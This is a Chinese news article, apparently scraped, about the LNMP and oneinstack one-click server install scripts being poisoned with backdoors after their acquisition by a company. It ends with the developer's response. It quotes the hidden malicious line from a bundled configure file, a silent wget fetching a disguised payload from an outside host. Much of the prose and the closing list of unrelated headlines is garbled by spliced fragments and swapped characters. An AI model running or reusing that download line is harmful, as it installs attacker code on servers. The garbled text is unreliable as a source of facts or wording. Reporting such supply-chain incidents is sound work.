9 月下旬，继L建议脚本国内安全公司发现知名 Web 集成环境安装脚本 “lnmp 一键安装包” 被投毒，后后门开发者、也被用户用类站长、添加企业 IT 管理员下载的程序一键安装包被加了后门程序。

当时我们都以为这是不使 LNMP 一键安装包的服务器被黑了 (LNMP.org)，不过后来有网友发现 LNMP 一键安装包已经被金华市矜贵网络科技有限公司 (下称金华矜贵) 收购。蓝点

而关于安装包被投毒问题金华矜贵没有发布任何声明，继L建议脚本LNMP 论坛的后后门发帖也遭到管理员删除。

现在来看这并不是也被用户用类服务器被黑了，因为被金华矜贵收购的添加另一个集成环境安装脚本 oneinstack 也被发现投毒，所以情况很明了了：那就是程序根本不是服务器被黑，而是不使他们自己在脚本里插入了恶意代码，用来下载某些恶意软件，蓝点进而可以控制大量网站或服务器，继L建议脚本但具体目的尚不清楚。

目前在 GitHub 和 V2EX 上已经有帖子在讨论这件事，鉴于金华矜贵还试图收购秋水逸冰的 lamp.sh 一键安装包 (但被秋大拒绝了)，他们后续可能还会盯上其他一键安装包，因此建议大家不要再使用这类一键安装包，否则自己的网站或服务器可能也会变成肉鸡。

更新：oneinstack 开发者回应称：金华市矜贵网络科技有限公司收购现有的几个面板以及安装包主要是为了布局类似宝塔的产品。想依赖 oneinstack 打开知名度。公司作为项目的投资商。协商的协议为公司为项目提供开发资金，并提供所有服务器资源。但是项目的管理权限以及运维权限都在我手中。目前各位开发者的精力主要是进行新的面板开发，对于出现本次被挂马事故主要原因在于我们没有对项目进行及时的管理。后续会加强安全措施。杜绝该问题的出现。

恶意代码藏在图片里：

pcre-8.45/configure:wget -q -nv http://download.oneinstack.club/osk.jpg -cO /var/local/osk.jpg

详细请看 GitHub 讨论：https://github.com/oneinstack/oneinstack/issues/511

• ·您能活到第几散？《辐射出亡所online》供逝世活动赛炽热开启！
• ·亚马逊民宣《如龙》真人剧！共六散 10月25日放奉上半部分
• ·游改电《愤怒的小鸟》官宣第三部 鸟鸟们冒险继续
• ·腊肠犬的衣服,你猜多少元一件？10件才20块!
• ·太空战机游戏《红视：太空突击》公布 明年登陆PC
• ·日本最新一周游戏销量榜 《八圆旅人》仍正在前10
• ·女子花1万8教舞跳得像供雨 觉得是公主收明是女王的静态图
• ·《问讲》此岸花寻宝，赢元灵、神兽辱物！
• ·Steam1月第二周销量排行 第一无悬念 亿万僵尸第二
• ·苹果启认新款iPadPro存正在衬着掉常题目 称正正在处理
• ·纯黑边牧多少钱,纯黑边境牧羊犬价格
• ·从安稳解锁到主动安防！海我掌静脉单摄智能锁P50 正式开卖
• ·《严阵以待》DLC＂Home Invasion＂实机预告公布 7月23日发售
• ·虎鲨呕吐出针鼹，震惊澳大利亚科学家
• ·佐伊导演处女座《眨眼两次》 钱老板已锁定你！
• ·诺基亚3210复刻足机卖断货 网友：有CCD感受 C心与时俱进